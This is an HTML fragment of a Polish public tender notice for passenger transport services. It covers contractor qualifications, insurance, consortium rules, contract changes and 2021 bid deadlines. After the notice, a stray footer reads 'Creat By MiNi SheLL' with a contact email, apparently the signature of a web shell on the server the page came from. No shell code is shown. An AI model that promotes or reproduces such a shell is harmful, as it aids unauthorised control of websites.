usługi przewozu odpowiadające zakresowi przedmiotu zamówienia (wg załącznika nr 5). <br/> 3) Warunek dotyczący, dysponowania odpowiednim potencjałem technicznym<br/> i osobowym, Zamawiający uzna za spełniony jeżeli Wykonawca wykaże że, posiada pojazdy przeznaczone do realizacji zadania oraz wykaże że dysponuje osobami zatrudnionymi na podstawie umowy o pracę.<br/> 4) warunek dotyczący sytuacji ekonomicznej Zamawiający uzna za spełniony jeżeli Wykonawca wykaże że :<br/>a)	Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż <br/>1 000 000,00<br/>b)	Jest ubezpieczony od następstw nieszczęśliwych wypadków kierowców i pasażerów (NNW)<br/>c)	Posiada polisę ubezpieczeń od odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych (OC). <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">) oświadczenie o niepodleganiu wykluczeniu i spełnianiu warunków udziału w postępowaniu (załącznik nr 2 do SWZ). Oświadczenie stanowi dowód potwierdzający brak podstaw wykluczenia, spełnianie warunków udziału w postępowaniu na dzień składania ofert, tymczasowo zastępujący wymagane przez Zamawiającego podmiotowe środki dowodowe. W przypadku wspólnego ubiegania się o zamówienie przez Wykonawców, oświadczenie te składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/>2) Wykonawca, w przypadku polegania na zdolnościach lub sytuacji podmiotów udostępniających zasoby, przedstawia wraz z oświadczeniem, także oświadczenie podmiotu udostępniającego zasoby ( załącznik nr 3), potwierdzające brak podstaw wykluczenia tego podmiotu oraz odpowiednio spełnianie warunków udziału w postępowaniu, w zakresie, w jakim Wykonawca powołuje się na jego zasoby.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) Warunek dotyczący posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, zamawiający uzna za spełniony w przypadku, gdy Wykonawca przedłoży następujące dokumenty:<br/>b)	Licencja na wykonywanie transportu drogowego osób, ważna przez cały okres wykonywania zamówienia.<br/>b)	Aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, wystawionego nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.<br/> 2) Warunek dotyczący posiadania wiedzy i doświadczenia, Zamawiający uzna za spełniony w przypadku, gdy Wykonawca przedłoży następujące dokumenty:<br/>Wykaże, że w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, (a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), wykonał <br/>i zakończył co najmniej 3 usługi przewozu odpowiadające zakresowi przedmiotu zamówienia <br/>(wg załącznika nr 5). <br/> 3) Warunek dotyczący, dysponowania odpowiednim potencjałem technicznym<br/> i osobowym, zostanie przez Zamawiającego uznany za spełniony w przypadku, gdy Wykonawca przedłoży następujące dokumenty:<br/>a) Wykaz środków technicznych (pojazdów) przeznaczonych do realizacji zadania <br/>(wg załącznika nr 6);<br/>b) Wykaz osób, które będą uczestniczyć w wykonaniu zamówienia (wg załącznika nr 7).<br/> 4) Zamawiający uzna że Wykonawca spełnia warunek dotyczący sytuacji ekonomicznej i finansowej jeżeli wykaże, że:<br/>d)	Jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną nie mniejszą niż <br/>1 000 000,00<br/>e)	Jest ubezpieczony od następstw nieszczęśliwych wypadków kierowców i pasażerów (NNW)<br/>f)	Posiada polisę ubezpieczeń od odpowiedzialności cywilnej posiadaczy pojazdów mechanicznych (OC).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> . Wykonawcy wspólnie ubiegający się o zamówienie:<br/>- ponoszą solidarną odpowiedzialność za niewykonanie lub nienależyte wykonanie zobowiązania;<br/>- muszą ustanowić pełnomocnika Wykonawców występujących wspólnie do reprezentowania ich w postępowaniu o udzielenie zamówienia publicznego albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia.<br/>Przyjmuje się, że pełnomocnictwo do podpisania oferty obejmuje pełnomocnictwo do poświadczenia za zgodność z oryginałem wszystkich dokumentów;<br/>- pełnomocnictwo musi jednocześnie wynikać z umowy lub innej czynności prawnej, mieć formę pisemną, fakt ustanowienia Pełnomocnika musi wynikać z załączonych do oferty dokumentów, wszelka korespondencja prowadzona będzie z Pełnomocnikiem;<br/>- przed zawarciem umowy o niniejsze zamówienie publiczne, jeżeli oferta konsorcjum zastanie wybrana, jako najkorzystniejsza Zamawiający może wezwać do przedstawienia umowy regulującej współpracę tych Wykonawców. <br/>2. Oferta wspólna, składana przez dwóch lub więcej wykonawców powinna spełniać następujące wymagania:<br/>1) musi być zgodna z postanowieniami SWZ,<br/>2) sposób składania dokumentów w przypadku składania oferty wspólnej:<br/> a) dokumenty wspólne tj.<br/> - oferta (załącznik nr 1 do SWZ)<br/>Podpisują wszyscy członkowie konsorcjum lub pełnomocnik w imieniu całego konsorcjum.<br/> b) dokumenty, tj.:<br/> - oświadczenie o spełnianiu warunków udziału w postępowaniu i braku podstaw do wykluczenia (załącznik nr 2) Składa każdy z partnerów konsorcjum w imieniu swojej firmy;<br/> - oświadczenie podmiotu trzeciego (załącznik nr 3) – podpisuje każdy udostępniający zasoby.<br/> - zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia- jeżeli dotyczy (załącznik nr 8) <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2.	Zamawiający przewiduje możliwość dokonania zmiany postanowień umowy na podstawie art. 455 ustawy Pzp, które zostaną wyrażone w formie pisemnego aneksu pod rygorem nieważności i mogą nastąpić wyłącznie w następujących sytuacjach:<br/>1)	zmiany terminu wykonania umowy, w przypadku:<br/>a)	wystąpienia okoliczności, których nie można było przewidzieć w chwili zawarcia umowy,<br/>b)	wstrzymanie realizacji przedmiotu umowy przez Zamawiającego nie wynikające z przyczyn leżących po stronie Wykonawcy,<br/>c)	wyrażenia zgody przez Zamawiającego na skrócenie terminu realizacji,<br/>2)	w zakresie zmiany wynagrodzenia, zwłaszcza w sytuacji zmiany stawki obowiązującego podatku od towarów i usług (VAT). <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-12-29 09:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">1.	Wykonawca składa ofertę za pośrednictwem „Formularza do złożenia, zmiany, wycofania oferty lub wniosku” dostępnego na ePUAP i udostępnionego również na miniPortalu. Funkcjonalność do zaszyfrowania oferty przez Wykonawcę jest dostępna dla Wykonawców na miniPortalu, w szczegółach danego postępowania.</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-12-29 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-01-27</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com